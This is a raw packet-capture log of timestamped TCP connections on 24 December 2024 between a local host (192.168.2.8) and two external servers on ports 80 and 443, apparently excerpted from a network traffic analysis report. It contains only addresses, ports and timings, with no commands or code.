                                                          Dec 24, 2024 02:18:17.210146904 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.210916996 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.211133957 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.211177111 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.211947918 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.212172985 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.212573051 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.213007927 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.213231087 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.213274002 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.214046955 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.214263916 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.214309931 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.215101004 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.215495110 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.215536118 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.216144085 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.216345072 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.216598988 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.217161894 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.217389107 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.217432976 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.218210936 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.218444109 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.218482018 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.219263077 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.219485044 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.219528913 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.220293045 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.220499992 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.220565081 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.221369982 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.221590996 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.221628904 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.222404957 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.222625017 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.222677946 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.223448992 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.223669052 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.223705053 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.224422932 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.230545044 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.299566984 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.307550907 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.508258104 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.508502007 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.508522987 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.508550882 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.509275913 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.509294033 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.509334087 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.510149956 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.510163069 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.510196924 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.511027098 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.511039972 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.511070967 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.516563892 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.516614914 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.516777039 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.524982929 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.525090933 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.628189087 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.628329039 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.628410101 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.632323027 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.700812101 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.700881958 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.700951099 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.704704046 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.704880953 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.704917908 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.712661028 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.712865114 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.712937117 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.720638037 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.720829964 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.720902920 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.728555918 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.728753090 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.728832960 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.736531019 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.736725092 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.736840010 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.744469881 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.744653940 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.744733095 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.752439022 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.752552032 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.752631903 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.760387897 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.760441065 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.760577917 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.768379927 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.768524885 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.768552065 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.775350094 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.775484085 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.775537968 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.785353899 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.785537004 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.785614014 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.095757961 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.215384960 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.492990971 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.493211985 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.493264914 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.495171070 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.496011972 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.496059895 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.496213913 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.500422955 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.500484943 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.500628948 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.504831076 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.963816881 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.963963032 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.965841055 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.965893030 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.966052055 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.967961073 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.968012094 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.968116999 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.969990015 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.970041990 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.970194101 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.972090960 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.972135067 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.972270966 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.974087000 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.974136114 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.974283934 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.976084948 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.976135969 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.976305962 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.978029013 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.978071928 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.978223085 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.979975939 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.980024099 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.980179071 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.981892109 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.981935024 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.982095957 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.983757019 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.983802080 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.983978033 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.985666037 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.985706091 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.985857964 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.987502098 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.987559080 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.987713099 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.989362001 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.989408970 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.989567041 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.991168976 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.991225958 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.991321087 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.992923021 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.993002892 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.993140936 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.994705915 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.994769096 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.994916916 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.996488094 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.996548891 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.996701956 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.998182058 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.998231888 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.998353004 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.069598913 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.069654942 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.069802046 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.070198059 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.070267916 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.070611000 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.071049929 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.071104050 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.071384907 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.071929932 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.071980953 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.072161913 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.072864056 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.072920084 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.073054075 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.073771954 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.073811054 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.073952913 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.074744940 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.074799061 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.074908018 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.075562000 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.075619936 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.202276945 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.220220089 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:19.220263004 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:19.221654892 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:19.225915909 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:19.225930929 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:19.227730989 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:19.227761984 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:19.227844954 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:19.228641987 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.230309010 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:19.230336905 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:19.348148108 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.349601984 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.362927914 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.482378960 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:20.244647980 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:20.276602983 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.276652098 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:20.276706934 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.277910948 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.277921915 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:20.445450068 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:20.445539951 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.445945024 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:20.446007967 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.456887960 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.456904888 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:20.457185030 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:20.459423065 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.459445000 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:20.460382938 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:20.506712914 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.506715059 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.609555960 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:20.609700918 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:20.609776020 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.166004896 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.166023970 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.166146994 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.175843000 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.175873041 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.176100969 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.301177979 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.420639038 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.489247084 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.489322901 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.491626978 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.491633892 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.491868019 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.557689905 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.557725906 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.557807922 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.702497005 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.702708960 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.702721119 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.702760935 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.703495979 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.703506947 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.703548908 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.704370975 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.704389095 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.704423904 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.705244064 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.705256939 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.705295086 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.710906982 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.710952044 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.711113930 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.720326900 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.720381975 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.822305918 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.822474003 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.822523117 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.826459885 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.894619942 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.894668102 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.894798994 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.897022009 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.897067070 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.897383928 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.905030966 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.905081987 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.905258894 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.913144112 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.913197994 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.913229942 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.915306091 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.915431976 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.915476084 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.919712067 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.919729948 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.921082973 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.921125889 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.921597004 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.929162025 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.929205894 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.929389954 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.930710077 CET49714443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.930746078 CET44349714172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.930809975 CET49714443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.931190014 CET49714443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.931204081 CET44349714172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.936896086 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.936989069 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.937033892 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.937161922 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.937206030 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.937236071 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.937247038 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.937258959 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.937263966 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.937453985 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.945101976 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.945147038 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.945219994 CET49715443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.945259094 CET44349715172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.945307970 CET49715443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.945316076 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.945708990 CET49715443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.945723057 CET44349715172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.953063965 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.953104019 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.953298092 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.961406946 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.961417913 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.961456060 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.971530914 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.971575975 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.971611977 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.975347996 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.975399971 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.983568907 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.983972073 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.984014988 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.024548054 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.144012928 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.256449938 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:22.256546021 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:22.256853104 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:22.256853104 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:22.256962061 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:22.256974936 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:22.264909983 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:22.908104897 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.908335924 CET8049711147.45.44.131192.168.2.8
